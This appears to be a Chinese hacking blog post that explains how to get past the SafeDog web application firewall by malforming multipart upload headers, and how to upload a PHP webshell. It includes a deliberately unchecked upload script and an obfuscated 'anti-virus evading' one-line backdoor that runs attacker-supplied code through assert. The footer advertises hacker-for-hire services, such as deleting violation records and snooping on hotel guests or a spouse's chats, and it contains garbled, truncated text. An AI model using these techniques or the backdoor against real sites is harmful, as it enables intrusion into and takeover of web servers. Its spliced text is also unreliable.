绕过网站安全狗阻拦,上传Webshell技巧总结(附免杀PHP一句话)

访客5年前黑客工具480

这篇文章我介绍一下我所知道的绕过网站安全狗上传WebShell的办法。
思路是:修正HTTP恳求,构成变形HTTP恳求,然后绕过网站安全狗的检测。
废话不多说,切入正题。。。。
1、试验环境:
Windows Server 2003、 Apache/2.4.18、PHP/5.3.29、网站安全狗(Apache版)V3.5.12048
2、用于文件上传的PHP源码:
 $path = dirname(__FILE__) . '/upload/';
 $rand = rand(0,30);
 move_uploaded_file($_FILES["file"]["tmp_name"],$path . $rand . $_FILES["file"]["name"]);
 echo "File Path:" . $path . $rand . $_FILES["file"]["name"] . "";
 echo "OK";
?>
由于此次试验的意图是绕过网站安全狗,所以PHP源码上我没做任何检测,把上传的文件直接放在upload目录下。
3、先看一下正常的HTTP恳求:

 
很明显,文件名为”yijuhua.php”被阻拦。。。。
4、测验%00切断:

 
很明显,失利了。。。
5、修正HTTP恳求,结构变形HTTP恳求
(1)删去实体里边的Conten-Type字段:


绕过网站安全狗的阻拦,成功上传WebShell。。。
(2)删去Content-Disposition字段里的空格:

 


 
(3)修正Content-Disposition字段值的大小写:

 
6、菜刀衔接一句话:

 
到此,上传WebShell完毕,各位看理解了吗?
7、免杀PHP一句话:
 /*
 PHP一句话木马
 assert($string)
 */
 $arr = array('a','s','s','e','r','t');
 $func = '';
 for($i=0;$i
 $func .= $func . $arr[$i];
 }
 $func($_REQUEST['c']);
?>

 
8、修正缝隙:
呈现这种状况,我认为是网站安全狗在开发时没有考虑到变形HTTP恳求,而Apache却兼容变形HTTP恳求,所以可以上传成功。
 

相关文章

黑客接单删违章记录吗,黑客查酒店客人入住信息联系电话,黑客从哪找

存在一致过滤。 以上的一致过滤只要在变量被单引号括起来的时分有用。 进行剖析后发现遗失了$_SERVER(假造client-ip和x-forwarded-for)因为ASP程序选用的对错编译性言语,这...

把借来的钱拿去赌博报警了能否拿回来

其他版本的还没有进行测试,但是在这里给一些建议。 漏洞影响面分析3、2019年5月23日Windows Server 2008 R2把借来的钱拿去赌博报警了能否拿回来, 4. CVE-2019-129...

解密职业黑客接单,找黑客帮忙查老公聊天记录被骗,全网找黑客

13、现在GOOGLE搜索要害字 intitle:网站小帮手 inurl:asp connect();(3)浮点数关于windows的.exe结束的体系程序KillDisk也同时删去,因...

看我怎么获取Facebook用户的隐私老友列表

当具有个人信息的组织机构发作数据失窃或遭受未授权拜访行为时,就或许发作用户信息走漏事情。一般来说,这是种安全事情会导致一些敏感触维护的秘要数据被广泛撒播、剖析或歹意运用。本文共享的缝隙writeup,...

俄罗斯黑客接单,手机被黑客锁了找客服,被骗后找 黑客 追损的想法不靠谱

关键词:NewAsp SiteManageSystem Version都是默许数据库地址翻开方针网站,然后在浏览器中将本机设为代理服务器,端口号8080。 这样一切经过浏览器发往网上的数据都将被Bur...

解压码-接单网

这个含糊测验方针现已至少发现了一个security regression:缝隙,修正补丁。 该缝隙的Reproducer输入是一个带有音讯文本的可读文件。 三、重出江湖的APT安排8、“714高炮”要...